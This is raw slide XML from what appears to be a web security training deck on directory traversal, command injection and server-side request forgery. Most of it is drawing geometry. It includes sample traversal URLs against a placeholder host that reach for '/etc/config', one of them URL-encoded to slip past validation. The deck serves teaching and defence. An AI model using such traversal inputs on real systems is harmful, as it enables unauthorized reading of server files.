                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498909" y="434873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532264" y="404233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566482" y="374540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601543" y="345814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637425" y="318076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674108" y="291347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711571" y="265648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749793" y="241000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788754" y="217423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828432" y="194939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868807" y="173568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909858" y="153330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951565" y="134248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993905" y="116341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036859" y="99630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080405" y="84137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124524" y="69881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169193" y="56885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214393" y="45168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260102" y="34752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306300" y="25657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352965" y="17904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400077" y="11514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447616" y="6507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495559" y="2906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543888" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592580" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641271" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1689600" y="2906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737543" y="6507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785082" y="11514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1832194" y="17904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878859" y="25657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925057" y="34752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970766" y="45168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015966" y="56885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060635" y="69881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104754" y="84137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148300" y="99630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191254" y="116341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233594" y="134248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275301" y="153330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316352" y="173568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2356727" y="194939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396405" y="217424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435366" y="241000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2473588" y="265648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2511051" y="291347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2547734" y="318076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2583616" y="345814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2618677" y="374540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2652895" y="404233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686250" y="434873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718720" y="466439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750286" y="498909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2780926" y="532264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810619" y="566482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2839345" y="601543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2867083" y="637425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893812" y="674108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2919511" y="711571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944159" y="749793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967736" y="788754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2990220" y="828432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011591" y="868807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3031829" y="909858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050911" y="951565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3068818" y="993905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3085529" y="1036859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101022" y="1080405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115278" y="1124524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128274" y="1169193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139991" y="1214393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150407" y="1260102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159502" y="1306300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167255" y="1352965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3173645" y="1400077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3178652" y="1447616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3182253" y="1495559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3184429" y="1543888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3185160" y="1592579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3184429" y="1641271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3182253" y="1689600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3178652" y="1737543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3173645" y="1785082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167255" y="1832194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159502" y="1878859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150407" y="1925057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139991" y="1970766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128274" y="2015966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115278" y="2060635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101022" y="2104754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3085529" y="2148300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3068818" y="2191254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050911" y="2233594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3031829" y="2275301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011591" y="2316352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2990220" y="2356727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967735" y="2396405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944159" y="2435366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2919511" y="2473588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893812" y="2511051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2867083" y="2547734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2839345" y="2583616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810619" y="2618677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2780926" y="2652895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750286" y="2686250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718720" y="2718720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686250" y="2750286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2652895" y="2780926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2618677" y="2810619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2583616" y="2839345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2547734" y="2867083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2511051" y="2893812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2473588" y="2919511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435366" y="2944159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396405" y="2967736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2356727" y="2990220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316352" y="3011591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275301" y="3031829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233594" y="3050911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191254" y="3068818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148300" y="3085529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104754" y="3101022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060635" y="3115278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015966" y="3128274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970766" y="3139991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925057" y="3150407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878859" y="3159502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1832194" y="3167255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785082" y="3173645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737543" y="3178652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1689600" y="3182253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641271" y="3184429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592580" y="3185160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543888" y="3184429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495559" y="3182253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447616" y="3178652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400077" y="3173645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352965" y="3167255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306300" y="3159502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260102" y="3150407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214393" y="3139991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169193" y="3128274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124524" y="3115278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080405" y="3101022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036859" y="3085529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993905" y="3068818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951565" y="3050911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909858" y="3031829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868807" y="3011591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828432" y="2990220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788754" y="2967736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749793" y="2944159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711571" y="2919511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674108" y="2893812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637425" y="2867083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601543" y="2839345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566482" y="2810619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532264" y="2780926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498909" y="2750286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466439" y="2718720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434873" y="2686250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404233" y="2652895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374540" y="2618677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345814" y="2583616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318076" y="2547734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291347" y="2511051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265648" y="2473588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241000" y="2435366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217423" y="2396405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194939" y="2356727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173568" y="2316352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153330" y="2275301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134248" y="2233594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116341" y="2191254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99630" y="2148300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84137" y="2104754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69881" y="2060635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56885" y="2015966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45168" y="1970766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34752" y="1925057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25657" y="1878859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17904" y="1832194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11514" y="1785082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6507" y="1737543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906" y="1689600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="1641271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1592579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70048" y="3799332"/>
              <a:ext cx="2363724" cy="236524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446014" y="4136898"/>
              <a:ext cx="1070610" cy="1750695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1070609" h="1750695">
                  <a:moveTo>
                    <a:pt x="0" y="845692"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="535051" y="845692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535051" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070102" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="1070609" h="1750695">
                  <a:moveTo>
                    <a:pt x="0" y="845819"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="535051" y="845819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535051" y="1750567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070102" y="1750567"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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22726" y="306451"/>
            <a:ext cx="920686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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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5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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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46554" y="3056381"/>
            <a:ext cx="4043679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Sample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directory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traversal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URL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5460" y="760476"/>
            <a:ext cx="12851892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594347" y="2543555"/>
            <a:ext cx="8191500" cy="1590040"/>
            <a:chOff x="6594347" y="2543555"/>
            <a:chExt cx="8191500" cy="159004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5975" y="2543555"/>
              <a:ext cx="8110728" cy="158953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94347" y="2929140"/>
              <a:ext cx="8191500" cy="70102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717791" y="2593847"/>
              <a:ext cx="7985759" cy="1466215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7985759" h="1466214">
                  <a:moveTo>
                    <a:pt x="7985759" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1466088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7985759" y="1466088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7985759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717791" y="2593847"/>
              <a:ext cx="7985759" cy="1466215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7985759" h="1466214">
                  <a:moveTo>
                    <a:pt x="0" y="1466088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7985759" y="1466088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7985759" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1466088"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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6796531" y="3013963"/>
            <a:ext cx="7763509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>
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://victim.foo/?show=../../../../etc/config</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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653783" y="2343924"/>
            <a:ext cx="8136890" cy="1840864"/>
            <a:chOff x="6653783" y="2343924"/>
            <a:chExt cx="8136890" cy="1840864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53783" y="2343924"/>
              <a:ext cx="8136635" cy="45413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699503" y="2389632"/>
              <a:ext cx="8022590" cy="340360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8022590" h="340360">
                  <a:moveTo>
                    <a:pt x="7928990" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93345" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57007" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27336" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7334" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="339852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8022336" y="339852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8022336" y="93345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8015001" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7994999" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7965328" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7928990" y="0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53783" y="3994353"/>
              <a:ext cx="8136635" cy="19042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699503" y="4040124"/>
              <a:ext cx="8022590" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8022590" h="76200">
                  <a:moveTo>
                    <a:pt x="8022335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8022335" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8022335" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6577583" y="5698235"/>
            <a:ext cx="8191500" cy="1728470"/>
            <a:chOff x="6577583" y="5698235"/>
            <a:chExt cx="8191500" cy="1728470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47687" y="5698235"/>
              <a:ext cx="8112252" cy="17282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77583" y="6086843"/>
              <a:ext cx="8191500" cy="104242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699503" y="5748527"/>
              <a:ext cx="7987665" cy="1605280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7987665" h="1605279">
                  <a:moveTo>
                    <a:pt x="7987284" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1604772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7987284" y="1604772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7987284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699503" y="5748527"/>
              <a:ext cx="7987665" cy="1605280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7987665" h="1605279">
                  <a:moveTo>
                    <a:pt x="0" y="1604772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7987284" y="1604772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7987284" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1604772"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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6779132" y="6172327"/>
            <a:ext cx="7767955" cy="70167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45"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://victim.foo/?show=%2e%2e%2f%2e%2e%2f%2e% </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-131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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>2e%2f%2e%2e%2fetc/config</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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637019" y="5500128"/>
            <a:ext cx="8135620" cy="1960245"/>
            <a:chOff x="6637019" y="5500128"/>
            <a:chExt cx="8135620" cy="1960245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7019" y="5500128"/>
              <a:ext cx="8135111" cy="45413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682739" y="5545835"/>
              <a:ext cx="8021320" cy="340360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8021319" h="340360">
                  <a:moveTo>
                    <a:pt x="7927467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93344" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57007" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27336" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7334" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="339851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8020811" y="339851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8020811" y="93344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8013477" y="57007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7993475" y="27336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7963804" y="7334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7927467" y="0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37019" y="7269429"/>
              <a:ext cx="8135111" cy="190423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682739" y="7315200"/>
              <a:ext cx="8021320" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8021319" h="76200">
                  <a:moveTo>
                    <a:pt x="8020811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8020811" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8020811" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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1355597" y="6201308"/>
            <a:ext cx="4860290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50875" marR="5080" indent="-638810">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Sample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URL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with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encoded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characters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including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validation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routine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29147" y="306451"/>
            <a:ext cx="499935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">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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65903" y="760476"/>
            <a:ext cx="7127748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061207" y="1756298"/>
            <a:ext cx="10538460" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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Server-Side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Request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Forgery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(SSRF)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causes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server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make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API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calls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HTTP</a:t>
            </a:r>
            <a:endParaRPr sz="2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1395"/>
              </a:spcBef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requests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with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arbitrary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parameters.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614737" y="3765613"/>
